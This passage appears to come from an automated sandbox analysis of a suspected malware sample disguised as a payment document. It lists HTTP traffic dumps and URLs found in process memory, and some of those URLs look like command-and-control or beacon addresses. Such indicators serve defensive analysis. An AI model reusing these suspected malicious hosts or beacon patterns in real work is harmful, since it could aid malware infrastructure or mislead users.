3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 07:13:02 GMTServer: ApacheX-ServerIndex: llim604Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 07:13:05 GMTServer: ApacheX-ServerIndex: llim605Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:13:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closevary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cUHwzHeeaK07BdDXGPgYn90TIdEYVBR1SAV6wEUL1lI8%2BYb6S%2BVcop685tmmlSSj0FiGcF0GeDsMYjQOXsPNOMStMs1TtT0VOgf3VxI7t%2FJTq7zBCJ7t08DLuf1CCQQEWTDnbncWcGWNQg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Content-Encoding: gzipserver-timing: cfL4;desc="?proto=TCP&rtt=1478&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=739&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:13:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closevary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F1Qp0ukKMEeQgs6o%2BwXck7xNYyZcumSwOAJJD84Cj7dF87XdMaCrjGWrYvj9I1MLqY%2FAvcs4d6H8GJZADfCa8Wq5RxkTIsXxXIQqQWFHDY%2FYEnghqv%2FSdyaSNi5bxCMfdQlmsGO%2FzaVmGw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Content-Encoding: gzipserver-timing: cfL4;desc="?proto=TCP&rtt=1814&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=759&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:13:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closevary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7YCUGYchLbJXV%2FJMALRkbPKPygHb%2B2S6JqxaAviQJta1hjsQXmpeKvh65zoEcqumyG5DAZ1QD4k6R1bTTlbGapU%2BK%2F72Hk2jcXlwci3puO1qEYR5NiIEcWJcMk%2B13NCbB%2FpjBUbxiv1Hog%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Content-Encoding: gzipserver-timing: cfL4;desc="?proto=TCP&rtt=1408&sent=1&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10841&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:13:32 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closevary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ouUuSoRynzFb31XBRZ2NbLSS0T1agnkjrQ8iKzVwb2%2FXJVMwe4j1yptinmvoxDWI960JcFPZlCnFdzpt%2Fr6jJDHeebcMa07RucPBdwvXO30T3NJu5Jwyf8UPm%2BgwGEeCvp941JjH4M9fGA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=1399&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=468&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:13:39 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:13:41 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:13:44 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:13:46 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: systeminfo.exe, 00000007.00000002.4149067807.000000000628A000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000003B6A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi?ZT=hLX784qEA4n55Q1oGw1olOPE1jv2cb5vRwpnfGUp
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: oDnyHukDVUZk.exe, 00000008.00000002.4150364860.0000000004AD4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.extrime1.shop
                Source: oDnyHukDVUZk.exe, 00000008.00000002.4150364860.0000000004AD4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.extrime1.shop/jr4j/
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: systeminfo.exe, 00000007.00000002.4149067807.000000000591E000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000031FE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.stationseek.online/wd23?ZT=hRp9
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: systeminfo.exe, 00000007.00000002.4151114745.00000000078B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
